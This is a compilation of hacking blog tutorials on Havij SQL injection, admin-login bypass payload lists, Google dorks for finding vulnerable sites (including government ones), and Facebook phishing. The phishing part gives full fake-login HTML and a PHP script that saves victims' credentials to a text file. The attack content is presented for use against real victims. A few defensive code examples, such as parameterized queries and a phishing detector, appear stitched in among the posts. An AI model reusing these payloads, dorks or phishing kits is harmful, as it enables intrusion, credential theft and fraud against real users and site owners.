
How to hack Website using Havij












Hello friends: I've posted a complete tutorial and guide to the manual SQL injection technique. But did you know that instead of those long procedures you can also use Havij, an automatic (advanced) SQL injection tool? So today I'll show you website hacking using Havij.

What is a Website Database ?

The website database is a collection of information such as images, login IDs, passwords, company data, etc. It is all stored in a server database so that it can be easily accessed, managed and updated. In one view, databases can be classified according to types of content: bibliographic, full-text, numeric, images, etc.

What is Havij ?

Havij Pro is an advanced SQLi vulnerability exploiter that can exploit a SQL injection vulnerability in a website and get access to the website's database. Havij is an automatic advanced SQLi tool.

How to hack Website using Havij ?

First of all, there is nothing hard in this tutorial and no difficult steps to follow. Just read it once. But if you really want to learn SQL injection, then try to do it manually instead of using any tools, as I showed in the latest tutorial on SQL injection website hacking techniques.

Now Let's start

Open Havij and copy and paste the infected link as shown in the figure





Now click "Analyze"






Then it shows some messages. Watch them and be patient for some time while it finds whether the site is vulnerable, the type of injection, whether the DB server is MySQL, and the database name. You then get the database name, something like xxxx_xxxx



Then move to the next operation to find tables by clicking "tables" as shown in the figure. Now click "Get tables", then wait some time if needed



After the tables are found, you will see a "users" table. Put a mark on it and click the "get columns" tab as shown in the figure


There, just mark username and password and click "Get data"


Bingo! You now have an ID and password that may be the admin's...
The password will come as an MD5 hash; you can also crack it using this tool as shown in the figure...
or search Google for "md5 decrypt" and follow a website


Requirements :
Vulnerable website [SQLi Vulnerable Website]


Havij SQL Tools free crack: [FULL VERSION] [CRACK]












Description: 

Havij is an automated SQL Injection tool that helps penetration testers to find and exploit SQL Injection vulnerabilities on a web page. 

It can take advantage of a vulnerable web application. Using this software, a user can fingerprint the back-end database, retrieve DBMS users and password hashes, dump tables and columns, fetch data from the database, run SQL statements and even access the underlying file system and execute commands on the operating system.

What makes Havij different from similar tools is its injection methods. The success rate is more than 95% at injecting vulnerable targets using Havij.

The user-friendly GUI (Graphical User Interface) of Havij and its automated settings and detections make it easy to use for everyone, even amateur users.




What's New? 

* Oracle error based database added with ability to execute query. 
* Getting tables and column when database name is unknown added (mysql) 
* Another method added for finding columns count and string column in PostgreSQL
* Automatic keyword finder optimized and some bugs fixed. 
* A bug in finding valid string column in mysql fixed. 
* 'Key is not unique' bug fixed 
* Getting data starts from row 2 when All in One fails - bug fixed 
* Run time error when finding keyword fixed. 
* False table finding in access fixed. 
* keyword correction method made better 
* A bug in getting current data base in mssql fixed. 
* A secondary method added when input value doesn't return a normal page (usually 404 not found) 
* Data extraction bug in html-encoded pages fixed. 
* String or integer type detection made better. 
* A bug in https injection fixed


[SQLi] Hack Admin Account Website












We're gonna hack into an admin account, using SQL injections.

How does it work: a SQL injection injects code into the query sent to the MySQL database, which gets past the site's login check.

Dorks:

    inurl:adminlogin.aspx

    inurl:admin/index.php


    inurl:administrator.php


    inurl:administrator.asp


    inurl:login.asp


    inurl:login.aspx


    inurl:login.php


    inurl:admin/index.php



    inurl:adminlogin.aspx

LET'S START !


Step 1: Go to Google, type in ''admin/login.asp site:net'' and search (you can also use the option to search only in your country).


Step 2: As you already can see in the first picture, we are looking for websites that look like this: example ''website.com/admin/login.asp''.


Step 3: Go to the website admin login page, type in:
username: 1'or'1'='1
password: 1'or'1'='1


NOW .. IT'S DONE ! .. WE ARE NOW LOGGED IN AS ADMINISTRATOR !
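Why the `1'or'1'='1` input from Step 3 gets past a login that builds its query by string concatenation, and how a parameterized lookup with a salted password hash rejects it. This is an added example, not code from the original post; the table layout, function names and SQLite backend are assumptions chosen so that it runs offline.

```python
import hashlib
import hmac
import os
import sqlite3

PAYLOAD = "1'or'1'='1"  # the string the page enters as both username and password


def kdf(password, salt):
    # Salted, deliberately slow hash (PBKDF2-HMAC-SHA256) rather than bare MD5.
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 100_000)


def make_db():
    """In-memory users table with one constructed account."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (username TEXT PRIMARY KEY, "
               "password TEXT, salt BLOB, pw_hash BLOB)")
    salt = os.urandom(16)
    # 'password' is a legacy plaintext column, present only so that the
    # vulnerable query below has something to compare against.
    db.execute("INSERT INTO users VALUES (?, ?, ?, ?)",
               ("admin", "s3cret-sample", salt, kdf("s3cret-sample", salt)))
    return db


def build_vulnerable_sql(username, password):
    # BAD: input is pasted into the SQL text. A quote in the input closes the
    # string literal, and whatever follows is parsed as SQL.
    return ("SELECT username FROM users WHERE username = '" + username
            + "' AND password = '" + password + "'")


def login_vulnerable(db, username, password):
    return db.execute(build_vulnerable_sql(username, password)).fetchone() is not None


def login_hardened(db, username, password):
    # GOOD: the placeholder sends the username as data, never as SQL text.
    row = db.execute("SELECT salt, pw_hash FROM users WHERE username = ?",
                     (username,)).fetchone()
    if row is None:
        kdf(password, b"\x00" * 16)  # keep timing similar for unknown users
        return False
    salt, stored = row
    return hmac.compare_digest(kdf(password, salt), stored)


if __name__ == "__main__":
    db = make_db()
    print(build_vulnerable_sql(PAYLOAD, PAYLOAD))
    print("vulnerable + payload:", login_vulnerable(db, PAYLOAD, PAYLOAD))
    print("hardened + payload:  ", login_hardened(db, PAYLOAD, PAYLOAD))
    print("hardened + real pw:  ", login_hardened(db, "admin", "s3cret-sample"))
```

The printed query ends in `or'1'='1'`, a condition that is true for every row, which is why the concatenated version returns a user without any valid credentials.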

Other injection queries:

    ‘ or 1=1 –

    1'or’1'=’1


    admin’–


    ” or 0=0 –


    or 0=0 –


    ‘ or 0=0 #


    ” or 0=0 #


    or 0=0 #


    ‘ or ‘x’='x


    ” or “x”=”x


    ‘) or (‘x’='x


    ‘ or 1=1–


    ” or 1=1–


    or 1=1–


    ‘ or a=a–


    ” or “a”=”a


    ‘) or (‘a’='a


    “) or (“a”=”a


    hi” or “a”=”a


    hi” or 1=1 –


    hi’ or 1=1 –


    hi’ or ‘a’='a



    hi’) or (‘a’='a

================================================

Some other Google dorks I am going to provide you, which I personally use:

intitle:"Index of /admin/css/" site:.com
intitle:"index of /gallery" site:.com
intitle:"index of /admin/photos" site:.com
intitle:"index of /images" site:.com
intitle:"index of /css" site:.com
intitle:"index of /js" site:.com
intitle:"index of admin/css" site:.com
intitle:"index of admin/js" site:.com
intitle:"index of admin/gallery" site:.com
intitle:"index of admin/uploads" site:.com


Now go to the admin area and put
user: admin
pass: admin

NOW .. IT'S DONE ! .. WE ARE NOW LOGGED IN AS ADMINISTRATOR !




SQLi Hacking Introduction










Hello everyone, I am going to teach you all about SQL injection.

I have found many script kiddies using SQLi techniques pre-defined somewhere on the web, or using tools like Havij, Mole, DarkMySQLi, etc., and calling themselves hackers. But by using those tools or by learning the SQLi commands, are they really L33t?

I strongly oppose script kiddies, and this blog is not for those who don't want to know the basics of SQL, jump to SQLi, and harass some web admins out there by abusing them and talking about poor security. Before abusing them and speaking shit about security, ask yourself how much you know about security.

Well, enough said about the script kiddies; let's get into the real world and see how one can be like an automated tool such as any SQL tool. Of course, the people who developed the tools are geniuses and have done a hell of a lot of research to test security or do pen-testing.

Let's use the knowledge wisely, and let's learn and discuss in order to protect. Remember, you might get rewarded if you use the knowledge wisely, and if you break security with criminal purpose, you might be busted.

Well, that's all for the introduction of the blog.


So, a lot has been said about SQL; what exactly is it?

It is Structured Query Language. It works by sending queries to a database and accessing its contents, which helps to produce some desired output or display.


The previous answer leads to another question: what is a database?

A database is a server or a place where data is stored, and data is any information related to any organization or business.


SQL helps us to extract the data from a database. With SQL we can delete, add, append, sort, update, create, set permissions, insert and execute commands on a database.


Now, how is a database structured?

Well, you cannot see the physical structure of a database, but logically a database consists of one or more tables, and each table consists of one or more records.


Each table in a database is identified by a specific name; hence, in a database, no two tables can have the same name. Records in a table are made of rows and columns, and each column is identified by a specific name. Two different tables can have the same column name, but in one table two columns cannot have the same column name. Rows are where data resides, thus making a full-blown table ready to be played with.


Hope this is informative, and yes, I know some of you might be aware of this, but it's for some noobs out there cribbing with SQL tools, abusing web admins and speaking shit about security.



HACK FACEBOOK THROUGH PHISHING USING WAPKA.MOBI














FRIENDS! AS THE TITLE OF OUR POST SUGGESTS, TODAY WE ARE GOING TO LEARN PHISHING VIA MOBILE. WAPKA IS A SITE WHICH IS USED TO PERFORM MOBILE PHISHING. AS ALL OF YOU KNOW, TO PERFORM A PHISHING ATTACK WE NEED WEB HOSTING; FOR THIS PURPOSE WE CHOOSE WAPKA (FREE WEB HOSTING FOR MOBILE). A HUGE ADVANTAGE PROVIDED BY WAPKA IS THAT IT DOESN'T BLOCK OUR ACCOUNT WHILE WE ARE PERFORMING OUR PHISHING ATTACK, AS OTHER FREE HOSTING WEBSITES DO.
----------------------------------------------------------------------------------------------

====>>> Steps to perform mobile phishing via wapka:

Step 1: Register a new Wapka account. First create a new Wapka account by clicking here

Step 2: Now log in to your account, go to (Site List) and create a new site. Example: www.example.wapka.mobi

Then click on Manage

Step 3: Now you have 2 modes available. Click on Admin mode.

Step 4: When you click on Admin mode you are redirected to a blank page. It's blank because so far you have done nothing to your newly created site.

At the lower rightmost corner you have a link ::EDIT SITE(#):: click on it.

Step 5: Now click on (WML/XHTML code). On clicking it you get a window.

Step 6: Copy the source code from here

<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE html PUBLIC "-//WAPFORUM//DTD XHTML Mobile 1.0//EN" "http://www.wapforum.org/DTD/xhtml-mobile10.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><title>Wapka.mobi</title><link rel="STYLESHEET" type="text/css" href="/styles.css"/><meta forua="true" http-equiv="Cache-Control" content="max-age=0"/><style type="text/css">
 body { background: ; 
color: ; 
 }
 a { color: ; 
 }
 </style>

 </head><body> 
<div><?xml version="1.0" ?>

 <!DOCTYPE wml PUBLIC "-//WAPFORUM//DTD WML 1.1//EN" "http://www.wapforum.org/DTD/wml_1.1.xml">


 <wml>
 <head>
 <meta forua="true" http-equiv="Cache-Control" content="max-age=0"/>
 <link rel="STYLESHEET" type="text/css" href="http://skfacebook.wapka.mobi/styles.css"/>
 </head>
 <template>
  <do type="options" name="Prev" label="Back"><prev/></do>
 </template>
 <card id="index" title="Facebook" > 
<p><!DOCTYPE html PUBLIC "-//WAPFORUM//DTD XHTML Mobile 1.0//EN" "http://www.wapforum.org/DTD/xhtml-mobile10.dtd"><html xmlns="http://www.w3.org/1999/xhtml">

<script type="text/javascript"> document.title = "Welcome to Facebook"; </script>

<head title="Welcome to Facebook"><title>Welcome to Facebook</title><meta name="description" content="Facebook helps you connect and share with the people in your life." /><meta name="referrer" content="default" id="meta_referrer" /><meta http-equiv="X-Frame-Options" content="deny" />

<!-----[ » © Fb Phishing 2013 copyrighted by TipsNet.Tk™ &amp; all credit goes to Shanto « ]-----!>


</head><body class="nontouch acw"><div class="mfsm"><div id="viewport"><div class="acb aps" id="u_0_0" data-sigil="MTopBlueBarHeader"><table cellspacing="0" cellpadding="0" class="lr"><tr><td valign="top"><h1><a href="http://m.facebook.com/home.php?_dmr&amp;refid=8"><img src="http://static.ak.fbcdn.net/rsrc.php/v2/yz/r/aKhO2tw3FnO.png" width="76" height="20" class="img" alt="facebook" /></a></h1></td></tr></table></div><div id="objects_container"><div id="root" tabindex="0" role="main" class="_fco acw" data-sigil="context-layer-root">

<div class="acy aps abb"><span class="mfss">You must login again.</span></div>
<form method="post" class="mobile-login-form _fcp" onSubmit="window.open ('http://facebook.com/wowtricks')" action="site_0.xhtml">
<div class="mobile-login-field aclb apl"><div>Email or Phone<br/><input type="text" name="mf_text[Email]" class="input"/>
</div></div><div class="mobile-login-field aclb apl"><div>Password<br/>
<input type="password" class="input" name="mf_text[Password]"/>
</div></div><div class="button_area aclb apl">
<input type="hidden" name="p" value="XXXXXXXX"/><input type="hidden" name="action" value="send_message"/>
<input type="submit" name="MF_submit" class="btn btnC largeBtn" size="0" value="Log In" /></div><hr style="background-color:#cccccc;height:1px;border:0px solid #fff;margin:0.3em auto;width:100%;" /><div class="mobile-login-form _fcp"><span class="mfss fcg" style="margin-left:6px;"><b>New to Facebook?</b></span></div><div class="_4u9b aclb"><div class="button_area aclb apl"><a class="btn btnS largeBtn" href="http://m.facebook.com/r.php?refid=8">Create New Account</a></div></div><input type="hidden" autocomplete="off" name="_fb_noscript" value="true" /></form><div class="other-links aclb apl"><span class="mfsm fcg"><a href="http://m.facebook.com/recover/initiate/?refid=8">Forgot password?</a><br /><a href="http://m.facebook.com/help/?refid=8">Help Center</a></span></div></div></div></div></div><div><div id="footer"><div class="acg apm"><span class="mfss fcg"><b>English (US)</b> <span role="separator" aria-hidden="true">·</span> <a class="sec" href="http://m.facebook.com/a/language.php?l=es_LA&amp;lref=http%3A%2F%2Fm.facebook.com%2F&amp;gfid=AQD28mdu19R_4ouf&amp;refid=8">Español</a> <span role="separator" aria-hidden="true">·</span> <a class="sec" href="http://m.facebook.com/a/language.php?l=pt_BR&amp;lref=http%3A%2F%2Fm.facebook.com%2F&amp;gfid=AQDjJGXjQ2aRMYRs&amp;refid=8">Português (Brasil)</a> <span role="separator" aria-hidden="true">·</span> <a class="sec" href="http://m.facebook.com/language.php?n=http%3A%2F%2Fm.facebook.com%2F&amp;refid=8">More…</a></span></div><div class="acg apm"><span class="mfss fcg">Facebook ©2013</span></div></div></div><div id="static_templates"></div></body>

</html>
</p><p align="center"><a href="/menu_0.wml">:=:</a></p><p style="text-align:center;"><a href="/ads/wapka/p/2465791/adshows/1/aid/8/country/IN/position/bottom">Super download speed only in uc browser</a></p><img src="/ga.gif?utmac=MO-32471805-1&amp;utmn=786667047&amp;utmr=-&amp;utmp=%2Fsite_0.xhtml&amp;guid=ON" width="1" height="1" /><img src="http://ga.wapka.me/ga3.gif?utmac=MO-32471805-3&amp;utmn=344471327&amp;utmr=-&amp;utmp=%2Fsite_0.xhtml&amp;guid=ON" width="1" height="1" />
   </card>
   </wml>

   </div><p align="center"><a href="/menu_0.xhtml">:=:</a></p><p style="text-align:center;"><a href="/ads/wapka/p/2466575/adshows/3/aid/8/country/IN/position/bottom">Super download speed only in uc browser</a></p><img src="/ga.gif?utmac=MO-32471805-1&amp;utmn=738948482&amp;utmr=-&amp;utmp=%2Findex.xhtml&amp;guid=ON" width="1" height="1" /><img src="http://ga.wapka.me/ga3.gif?utmac=MO-32471805-3&amp;utmn=1497913535&amp;utmr=-&amp;utmp=%2Findex.xhtml&amp;guid=ON" width="1" height="1" /></body></html>



Copy all the code and paste it into (WML/XHTML code) box and click on Submit button.

Step 7: It's all over now. Send your site link, which was created at Step 2, to your victim. When your victim logs in to your page, his/her e-mail and password are sent to the e-mail address with which you created your account at Wapka in the first step.

So friends Enjoy hacking…………. 

Note: It’s only for education purpose don’t use it to fraud. Admin is not responsible for whatever you will do from your newly acquired knowledge.

HACKING FACEBOOK ACCOUNTS BY PHISHING – STEP BY STEP!



Hello guys, it's been quite a long time since I delivered you some good stuff, so today I decided to write about hacking Facebook accounts by phishing. Generally, phishing is stealing usernames and passwords using a fake page. Suppose you want to hack a victim's Facebook account, so you create a page which looks very similar to Facebook and host it somewhere so that your victim can log in. When the victim tries to log into his account, he is redirected to the given page and his credentials are sent to you through an email or simply get recorded in some text file. Today we are going to create a Facebook phishing page using simple HTML and PHP coding. Let's get started..!!!
--------------------------------------------------------------------------------------------------------------

Step 1: Go to http://www.facebook.com and right-click on the home page and select view page source.


Copy the complete source code and paste it in notepad or some other text editor (I use Notepad++) for further editing.

Step 2: Find something which looks like this:


Step 3: Then change the action URL to login.php, now it will look similar to this.


Save it as index.html.

Step 4: Open a notepad and paste the following code inside it and save as login.php.

<?php
header (‘Location: http://www.facebook.com&#8217;);
$handle = fopen(“passwords.txt”, “a”);
foreach($_POST as $variable => $value)

{
fwrite($handle, $variable);
fwrite($handle, “=”);
fwrite($handle, $value);
fwrite($handle, “\r\n”);
}
fwrite($handle, “\r\n”);
fclose($handle);
exit;
?>


 Here, the victim will be redirected to http://www.facebook.com. You can change it to your desired location by editing the arguments of header function in the above PHP code.

Step 5: Create another blank text file for storing the hacked usernames and passwords and name it as passwords.txt.

Now you are done with the setup of phishing page, all you need to do is host it somewhere on internet so that it becomes available to your victim.


Step 6: Go to some free hosting site like http://www.000webhost.com and sign up for free. You will be provided with 1.5GB free space to host your web pages and free domain. You will have to complete email confirmation step to get your web page running.

Step 7: Once you get your account activated, sign in and click Go to CPanel as shown below.


Step 8: Then click on File Manager



Step 9: Now you will see a folder public html in the web based ftp client page, click on the folder and open it.


Step 10: Click on Upload and select all the 3 files and finally click on the green tick to upload them as shown in the image below.


Once you get your files uploaded you can check your page at your registered domain.  The victim’s password will be automatically written into passwords.txt file, just open the file to see the username and password!

Congratulations you are done creating your phishing page! If you have understood everything perfectly then you can use this technique to create phishing pages for other sites also.  Feel free to comment below, I might come up with an article describing the procedure to host the webpage on your system. So stay tuned and keep yourself updated.  

Note: Phishing pages at free hosting services will be immediately deleted, if once detected. So my advice is to use a paid hosting service or else host it on your system.
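From the defender's side, both phishing posts above produce the same observable page: a title carrying the brand name and a password form served from, and posting to, a host that does not belong to the brand. The following added example (not code from the original posts) checks a fetched page for that combination; the brand-to-domain table, the sample page and the URLs are constructed assumptions.

```python
from html.parser import HTMLParser
from urllib.parse import urljoin, urlsplit

# Assumption: brand keyword -> domains that may legitimately show its login form.
BRAND_DOMAINS = {"facebook": ("facebook.com",)}

# Constructed sample page with the shape the posts describe.
SAMPLE_PAGE = """<html><head><title>Welcome to Facebook</title></head><body>
<form method="post" action="login.php">
<input type="text" name="email"/><input type="password" name="pass"/>
<input type="submit" value="Log In"/></form></body></html>"""


class LoginFormScanner(HTMLParser):
    """Collects the page title and the action of every form with a password field."""

    def __init__(self):
        super().__init__()
        self.title = ""
        self._in_title = False
        self._form_action = None          # action of the form currently open
        self.password_form_actions = []

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "title":
            self._in_title = True
        elif tag == "form":
            self._form_action = a.get("action") or ""
        elif tag == "input" and (a.get("type") or "").lower() == "password":
            if self._form_action is not None:
                self.password_form_actions.append(self._form_action)

    def handle_endtag(self, tag):
        if tag == "title":
            self._in_title = False
        elif tag == "form":
            self._form_action = None

    def handle_data(self, data):
        if self._in_title:
            self.title += data


def host_matches(host, domains):
    # Exact domain or a true subdomain; "notfacebook.com" must not match.
    host = (host or "").lower()
    return any(host == d or host.endswith("." + d) for d in domains)


def assess(page_url, html):
    scanner = LoginFormScanner()
    scanner.feed(html)
    findings = []
    page_host = urlsplit(page_url).hostname
    for brand, domains in BRAND_DOMAINS.items():
        if brand not in scanner.title.lower() or not scanner.password_form_actions:
            continue
        if not host_matches(page_host, domains):
            findings.append(f"{brand} login form served from {page_host}")
        for action in scanner.password_form_actions:
            target = urlsplit(urljoin(page_url, action)).hostname
            if not host_matches(target, domains):
                findings.append(f"credentials post to {target}")
    return findings


if __name__ == "__main__":
    print(assess("http://login-sample.example.test/index.html", SAMPLE_PAGE))
    print(assess("https://www.facebook.com/login/", SAMPLE_PAGE))
```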


Chapter 1: Learning how to use Dorks


For Beginners

A method of finding websites vulnerable to SQL injection is using what we call "dorks".
Dorks: They are like search criteria in which a search engine returns results related to your dork.
The process can be a little time consuming, but the outcome will be worth it after learning how to use dorks.


For this tutorial, the search engine we'll be using is Google
Credits to those who are mentioned in this tutorial
Now I'll show you how to use dorks with the help of a video too.



Step1: Finding your dorks i.e. the criteria you'll be using
Dork List compiled by kobez-

Code:
http://pastebin.com/0FqmasC7

Dork List by Sidesipe-

Code:
http://pastebin.com/x1rtqktj

Dork List by .Newsletter'

Code:
http://pastebin.com/APxqavu9

For this tutorial, we'll be using this dork "inurl:index.php?id="



Step2: Making use of your Dorks with the help of Google

Here's what you do:

  • Go to http://www.google.com
  • Type the dork in the search bar "inurl:index.php?id=" (with or without quotes)
  • Now you'll find a whole lot of links in your results

Here's how you can speed up your process:
In your mouse, there should be a scroll button right?
Hover your mouse on each link and hit the scroll button so that it'll open on a new tab. (Lets say you can open about 10 links at a time)



Step3: Vulnerability approach

Now to see whether the website is vulnerable to SQL injection or not, we simply put in a quote " ' " at the end of the url address.
So our site will look like this

Code:
http://www.site.com/index.php?id=123'

Do the same thing with the websites you opened on your tabs and see if there's any vulnerable website.

To determine if a website is vulnerable or not, it should return an error!

Note: If you can't find any vulnerability after doing some vulnerability search on this dork, you can always browse the dork list I've mentioned above and use any of them until you find any website vulnerable to SQL injection
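From the defender's side, the trailing-quote probe from Step 3 and the boolean conditions listed elsewhere on this page leave recognizable traces in web server access logs. The following added example (not from the original tutorial) scans constructed combined-format log lines for both and records whether the server answered with an error; the log lines, field names and patterns are assumptions for illustration.

```python
import re
from collections import Counter
from urllib.parse import parse_qsl, urlsplit

# Constructed sample lines (combined log format, documentation IP ranges).
SAMPLE_LOG = """\
203.0.113.7 - - [10/Mar/2024:10:00:01 +0000] "GET /index.php?id=123 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.7 - - [10/Mar/2024:10:00:03 +0000] "GET /index.php?id=123%27 HTTP/1.1" 500 310 "-" "Mozilla/5.0"
198.51.100.9 - - [10/Mar/2024:10:01:10 +0000] "GET /search.php?q=o%27brien+books HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
203.0.113.7 - - [10/Mar/2024:10:02:15 +0000] "GET /admin/login.asp?user=1%27or%271%27%3D%271&pass=x HTTP/1.1" 200 900 "-" "Mozilla/5.0"
192.0.2.44 - - [10/Mar/2024:10:03:00 +0000] "GET /index.php?id=7%20or%201=1-- HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
"""

LOG_LINE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3}) ')

# "or X = X" with optional quotes or parentheses around X, e.g. or 1=1, or 'a'='a
TAUTOLOGY = re.compile(
    r"""\bor\b\s*['"(]*\s*(\w+)\s*['")]*\s*=\s*['"(]*\s*\1\b""", re.IGNORECASE)


def classify(value):
    """Return the reasons a decoded parameter value looks like an SQLi probe."""
    reasons = []
    # A value that ends in a quote is the probe from Step 3; a quote in the
    # middle of a value (o'brien) is ordinary text and is not flagged.
    if value.rstrip().endswith("'"):
        reasons.append("trailing-quote")
    if TAUTOLOGY.search(value):
        reasons.append("tautology")
    return reasons


def scan(log_text):
    findings = []
    for line in log_text.splitlines():
        m = LOG_LINE.match(line)
        if not m:
            continue
        ip, _method, target, status = m.groups()
        url = urlsplit(target)
        for param, value in parse_qsl(url.query):  # parse_qsl URL-decodes values
            for reason in classify(value):
                findings.append({
                    "ip": ip, "path": url.path, "param": param, "reason": reason,
                    # A 5xx answer to a probe means the input reached the query;
                    # fix that endpoint first. Errors shown inside a 200 page
                    # are not visible in the status code.
                    "server_error": int(status) >= 500,
                })
    return findings


def probes_per_ip(findings):
    return Counter(f["ip"] for f in findings)


if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f)
    print(probes_per_ip(scan(SAMPLE_LOG)).most_common())
```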









Extra Notes: Hunting for specific websites with specific domains
Ever want to hack a government website, or an organization website?
It's simple. All you have to do is improvise your dorks.
First off, here are some common domains
.gov = Government websites
.edu = Educational websites
.org = Organizational websites
.com = Commercial websites
.info = Informative websites
.net = Networking websites ( similar to .com)

Alright now you know some specific domains, lets add them to our dork shall we?
Follow this formula-like dork

Code:
"inurl:."domain"/"dorks" "
So you would normally understand it like this:
"inurl" = input URL
"domain" = your desired domain ex. .gov
"dorks" = your dork of your choice
Now for an example, lets say you want to hack government websites
Here's how it'll look
"inurl:.gov/index.php?id="
Once you search that up, you'll find a lot of government websites on your results

Changing "inurl" and using another one
Yes, you can change that too.
Google has a lot of functions you can come up with
Some of them are below where you can change "inurl" and make another dork

Code:
intitle:
intext:
define:
site:
info:
link:
Credits to Real Steel for bringing this up
Choose any of them and make another.
Example: "intext:.edu/gallery?id="
More information about those here: http://www.hackforums.net/showthread.php?tid=2033496








 



Some Dork Scanners you can use to help you speed up the process

Scanner by moveax
http://www.hackforums.net/showthread.php?tid=1985016

Scanner by p0iz0ner
http://www.hackforums.net/showthread.php...SQL+poizon

Scanner by kript0x

http://www.hackforums.net/showthread.php...rk+scanner

If you're lazy in using dorks to find vulnerable websites, then you can use some list right here:

Vulnerable List by Dyme:
http://pastebin.com/kVMYX0Eh

End of Chapter 1
Upcoming chapters:

Chapter2- Basic MySQL injection using "Login" Queries
Please stay tuned for my tutorials; I hope you enjoyed this chapter
© Cyber insect hacking world All rights reserved | Thanks for visiting